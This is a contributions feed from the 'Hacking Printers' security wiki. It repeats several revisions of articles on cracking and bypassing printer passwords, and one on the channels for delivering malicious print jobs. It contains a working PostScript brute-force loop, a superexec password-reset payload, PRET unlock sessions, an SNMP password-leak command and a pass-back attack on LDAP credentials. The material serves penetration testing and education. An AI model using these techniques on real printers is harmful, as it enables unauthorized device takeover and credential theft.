Hacking Printers - User contributions [en]

Credential disclosure

2017-02-08T13:02:36Z

92.228.38.179:

Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure.

== Brute-Force Attacks ==

Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary.

=== PJL ===

PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>:

@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON

PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes.

While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless.

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection: ENABLED
Panel lock: ON
Disk lock: ON
printer:/> unlock
No PIN given, cracking.
PIN protection: DISABLED
Panel lock: OFF
Disk lock: OFF

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.

=== PostScript ===

PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:

<syntaxhighlight lang=postscript>
/min 0 def /max 1000000 def
statusdict begin {
min 1 max
{dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop
</syntaxhighlight>

Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all.

Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (<code>1183615869</code>, see <ref>''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec & the pdfmark Instruction Set]'', D. Lancaster, 2002</ref>). Wrapping PostScript code into ''superexec'' allows an attacker to ignore various protection mechanisms of the language, which would normally raise an ''invalidaccess'' error. This can be used to set PostScript passwords without initially submitting the current password as shown below:

<syntaxhighlight lang=postscript>
{ << /SystemParamsPassword (0)
/StartJobPassword (0) >> setsystemparams
} 1183615869 internaldict /superexec get exec

</syntaxhighlight>

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Device unlocked with password: 999
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
printer:/> unlock bypass
Resetting password to zero with super-secret PostScript magic
Device unlocked with password: 0

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job.

== Password Disclosure ==

=== SNMP ===

Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers.

'''How to test this attack?'''

To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below:

<syntaxhighlight lang=sh>
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
</syntaxhighlight>

Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes.

'''Who can perform this attack?'''

Anyone who can send network packets to port 161/udp of the printer device.

=== Pass-Back ===

Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.

'''How to test this attack?'''

Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password.

'''Who can perform this attack?'''

Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection.

----

Credential disclosure

2017-02-08T13:00:19Z

92.228.38.179:

Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure.

== Brute-Force Attacks ==

Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary.

=== PJL ===

PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>:

@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON

PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes.

While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless.

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection: ENABLED
Panel lock: ON
Disk lock: ON
printer:/> unlock
No PIN given, cracking.
PIN protection: DISABLED
Panel lock: OFF
Disk lock: OFF

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.

=== PostScript ===

PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:

<syntaxhighlight lang=postscript>
/min 0 def /max 1000000 def
statusdict begin {
min 1 max
{dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop
</syntaxhighlight>

Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all.

Another approach is to '''bypass PostScript passwords''' by resetting them with Adobe's proprietary ''superexec'' operator. This operator resides in the ''internaldict'' dictionary, which is ‘protected’ by a static, magic password (<code>1183615869</code>, see <ref>''[http://www.tinaja.com/glib/interdic.pdf PostScript’s Internaldict, Superexec & the pdfmark Instruction Set]'', D. Lancaster, 2002</ref>). Wrapping PostScript code into the operator allows an attacker to bypass various protection mechanisms of the language, which would normally raise an ''invalidaccess'' error. This can be used to set PostScript passwords without initially submitting the current password as shown below:

<syntaxhighlight lang=postscript>
{ << /SystemParamsPassword (0)
/StartJobPassword (0) >> setsystemparams
} 1183615869 internaldict /superexec get exec

</syntaxhighlight>

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords or to bypass them with ''superexec'' magic:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Device unlocked with password: 999
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
printer:/> unlock bypass
Resetting password to zero with super-secret PostScript magic
Device unlocked with password: 0

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job.

== Password Disclosure ==

=== SNMP ===

Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers.

'''How to test this attack?'''

To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below:

<syntaxhighlight lang=sh>
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
</syntaxhighlight>

Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes.

'''Who can perform this attack?'''

Anyone who can send network packets to port 161/udp of the printer device.

=== Pass-Back ===

Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.

'''How to test this attack?'''

Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password.

'''Who can perform this attack?'''

Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection.

----

Credential disclosure

2017-02-08T10:31:37Z

92.228.38.179: /* PostScript */

Printers are commonly deployed with a default password or no initial password at all. In both cases, end-users or administrators have to actively set a password to secure the device. This article discusses generic brute-force attacks against PJL and PostScript passwords as well as model specific password disclosure.

== Brute-Force Attacks ==

Besides credentials leaked from sources like [[File system access|file system]] or [[memory access]], [[#SNMP|SNMP]] and the printer's [[#Pass-Back|embedded web server]], printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both [[PJL]] and [[PostScript]]. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can disable some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary.

=== PJL ===

PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. PJL disk lock as shown below is the defense mechanism propagated by HP against PJL file system access, including its known path traversal vulnerabilities <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>:

@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON

PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> who were able to unlock the disk protection within 6 hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>, cracking time has efficiently decreased. In a test with 20 devices, between 50 and 1,000 passwords could be evaluated per second leading to average cracking times between 30 seconds and 10 minutes.

While PJL passwords can be set on various devices, actual disk lock and/or control panel lock is only supported by few printers. It is unclear if the password has any undocumented, proprietary effects on these machines or is just a dummy variable. Furthermore, non-compliant with the PJL standard, Brother based devices do not even verify the password to lock or unlock the control panel, rendering it practically useless.

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against PJL passwords:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection: ENABLED
Panel lock: ON
Disk lock: ON
printer:/> unlock
No PIN given, cracking.
PIN protection: DISABLED
Panel lock: OFF
Disk lock: OFF

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.

=== PostScript ===

PostScript offers two types of passwords: The ''SystemParamsPassword'' is used to change print job settings like paper size, while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximum length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackers point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:

<syntaxhighlight lang=postscript>
/min 0 def /max 1000000 def
statusdict begin {
min 1 max
{dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop
</syntaxhighlight>

Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. Brother based devices are exceptions as ''BR-Script'' only accepts one password per second but also checks for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. As it seems, Kyocera's ''KPDL'' does not support setting permanent PostScript passwords at all.

'''How to test this attack?'''

The ''lock'' and ''unlock'' commands of [[PRET]] can be used to test brute-force attacks against numeric (integer) PostScript passwords:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Found password: 999

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by cracking it in a single print job.

== Password Disclosure ==

=== SNMP ===

Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by printer manufacturers.

'''How to test this attack?'''

To test this attack against ancient HP printers, the ''snmpset'' tool can be used as shown below:

<syntaxhighlight lang=sh>
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
</syntaxhighlight>

Vulnerable devices will return the password in hexadecimal (here: ''AAA''), while newer devices do only respond with zerobytes.

'''Who can perform this attack?'''

Anyone who can send network packets to port 161/udp of the printer device.

=== Pass-Back ===

Another interesting class of attacks is pass-back attacks were ‘an MFP device is directed into authenticating [...] against a rogue system rather than the expected server’ <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where a printer/MFP authenticates users via an external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the credentials to access the LDAP server are stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the stored credentials, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP credentials to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.

'''How to test this attack?'''

Check if you can change printer settings like the LDAP hostname while keeping the old LDAP password.

'''Who can perform this attack?'''

Usually anyone who can access the printer's embedded web server. This may include [https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF] attacker, if the web application running on the printer has no CSRF protection.

----

Attack carriers

2017-02-08T09:58:30Z

92.228.38.179:

[[File:Deployment-channels.png|thumb|Overview of channels to deploy a (malicious) print job]]

Various channels like [[USB]], [[LPD]], [[IPP]], [[SMB]], or [[raw]] port 9100 printing can be used as carriers to deploy malicious print jobs. While it is possible the attack [[Fundamentals#Network_printing_protocols|printing protocols]] themselves, most attacks discussed in this wiki are targeted for the [[PostScript]] and [[PJL]] interpreters. The payload is just routed by any of the printing channels. This is important to note because it means '''whenever the attacker can somehow ‘print’ she can attack and exploit those interpreters'''.

[[File:Printing-overview.png|400px|Attack the interpreters, not the printing channels]]

This fact makes it very harder for the blue team ([[Countermeasures#Admins|network administrators]], for example) to defend against printer attacks. Many devices even allow printing (and therefore exploitation) by uploading a raw file to the printer's [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] service or to a form on the embedded web server. To get an impression, an overview of printing channels supported by various printer models is given below.

{| class="wikitable" style="text-align:center"
|+ Malicious print job deployment channels
|-
! Printer model !! LPD !! IPP !! Raw !! Web !! FTP !! SMB !! USB
|-
| style="text-align:left;" | HP LaserJet 1200 || ✔ || || ✔ || || || ||
|-
| style="text-align:left;" | HP LaserJet 4200N || ✔ || ✔ || ✔ || || ✔ || ||
|-
| style="text-align:left;" | HP LaserJet 4250N || ✔ || ✔ || ✔ || ✔ || ✔ || || ✔
|-
| style="text-align:left;" | HP LaserJet P2015dn || ✔ || || ✔ || || || ✔ || ✔
|-
| style="text-align:left;" | HP LaserJet M2727nfs || ✔ || || ✔ || || || ✔ || ✔
|-
| style="text-align:left;" | HP LaserJet 3392 AiO || ✔ || || ✔ || || || ✔ || ✔
|-
| style="text-align:left;" | HP Color LaserJet CP1515n || ✔ || || ✔ || || || || ✔
|-
| style="text-align:left;" | Brother MFC-9120CN || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Brother DCP-9045CDN || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Lexmark X264dn || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Lexmark E360dn || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Lexmark C736dn || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Dell 5130cdn || ✔ || ✔ || ✔ || || ✔ || ✔ || ✔
|-
| style="text-align:left;" | Dell 1720n || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Dell 3110cn || ✔ || || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Kyocera FS-C5200DN || ✔ || || ✔ || || ✔ || ✔ || ✔
|-
| style="text-align:left;" | Samsung CLX-3305W || ✔ || ✔ || ✔ || || || || ✔
|-
| style="text-align:left;" | Samsung MultiPress 6345N || ✔ || ✔ || ✔ || ✔ || || || ✔
|-
| style="text-align:left;" | Konica bizhub 20p || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | OKI MC342dn || ✔ || ✔ || ✔ || ✔ || ✔ || ✔ || ✔
|-
| style="text-align:left;" | Konica bizhub C454e || ✔ || ✔ || ✔ || ✔ || || ✔ || ✔
|-
|}

It must be noted that these are not the only possible attack scenarios. For example using social engineering to make a victim print a malicious document is not even covered in this wiki yet – neither are new methods to deploy (potentially malicious) print jobs like [https://en.wikipedia.org/wiki/Cloud_printing cloud printing] or [https://webbluetoothcg.github.io/web-bluetooth/ Web Bluetooth].

== Attacker Models ==

A '''physical attacker''' has the capability to print documents from USB stick or via USB/parallel cable. An (wired or wireless) attacker connecting through a '''TCP/IP network''' can deploy print jobs over LPD, IPP, port 9100/tcp, FTP, SMB and the embedded web server. Under the assumption that no strong user authentication like smart card based access control or SSL client certificates is enforced, both attacker models do obviously have a channel to print which is the precondition for further attacks to be carried out. Both are certainly quite strong attacker models because they require direct access – either physical or logical – to the device. However, in penetration testing scenarios where sneaking into the building is not an option and the printer is not directly reachable over the internet, other deployment channels are required. In such cases, the '''victim's web browser''' can be used as a carrier for printer malware as discussed in [[cross-site printing]].

→ ''Related articles:'' [[USB drive or cable]], [[Port 9100 printing]], [[Cross-site printing]]